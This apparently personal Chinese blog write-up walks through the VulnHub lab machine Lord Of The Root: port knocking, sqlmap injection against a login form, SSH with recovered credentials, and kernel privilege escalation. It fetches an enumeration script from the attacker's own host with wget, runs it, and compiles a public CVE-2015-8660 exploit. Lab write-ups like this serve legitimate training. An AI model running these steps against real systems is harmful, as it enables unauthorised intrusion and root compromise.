Lord-Of-The-Root-1-0-1

前言

1、靶机下载地址:https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova 2、涉及知识点: >1、端口碰撞 >2、内核提权(Ubuntu14.04版本) >3、UDF提权

靶机知识点记录

使用nmap探测之后发现靶机只开放了22(ssh)端口??什么玩意儿。。。 在尝试ssh登录时发现一部分内容: 45 看到了easy as 1,2,3。 以前也没遇到过,再查看别人的打靶记录之后发现原来是关于端口碰撞(Port Knocking)技术的知识点。

端口碰撞是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。如果收到正确的连接请求序列,防火墙规则就会被动态更改,从而允许连接请求的主机通过特定端口进行连接。如果不是按照特定的端口序列进行请求,那么受保护的端口就会关闭。

靶机这个意思应该就是要按照端口1、2、3的序列进行连接尝试。之后打开受保护的端口。 端口碰撞方法

  • 1 knock命令

konck 192.168.206.144 1 2 3 -v

  • 2 nmap命令

按次序进行指定端口扫描即可

2

之后再使用nmap探测。 后面在找到登录页面之后尝试进行sql注入。 普通的方式进行SQLmap注入扫描没找到,使用sqllmap进行针对表单的注入:

sqlmap -o -u http://192.168.206.144:1337/978345210/index.php –forms –dbs

在拿到账号密码之后使用ssh登录靶机

ssh smeagol@192.168.206.144 MyPreciousR00t

登录之后当然要开始收集信息进行提权了,查看系统版本

uname -a Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

也可以给靶机上传一个信息收集文件 本机使用python开启一个http服务

python -m http.server

靶机下载文件

wget http://192.168.206.1:8000/linux-exploit-suggester.sh chmod 777 linux-exploit-suggester.sh ./linux-exploit-suggester.sh

收集一波之后发现可以使用脏牛提权,但是试了几次都把靶机搞坏了,换一种方法吧。 我使用的多的信息收集工具是linpeas.sh。 好了先使用内核提权搜索Ubuntu14.04版本提权漏洞 找到一个CVE-2015-8660

下载之后执行以下命令就行

gcc 39166.c -o dayu chmod 777 czy ./dayu

提权成功 1 之前使用linpeas.sh收集信息时发现还有个地方有问题 1 在root目录下发现还有一个python文件switcher.py文件,内容与3个door文件有关,这里涉及缓冲区溢出的问题,有时间再看。 然后还有一种提权方法就是UDF提权 直接用的exp:

12

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码

请我喝杯咖啡吧~

支付宝
微信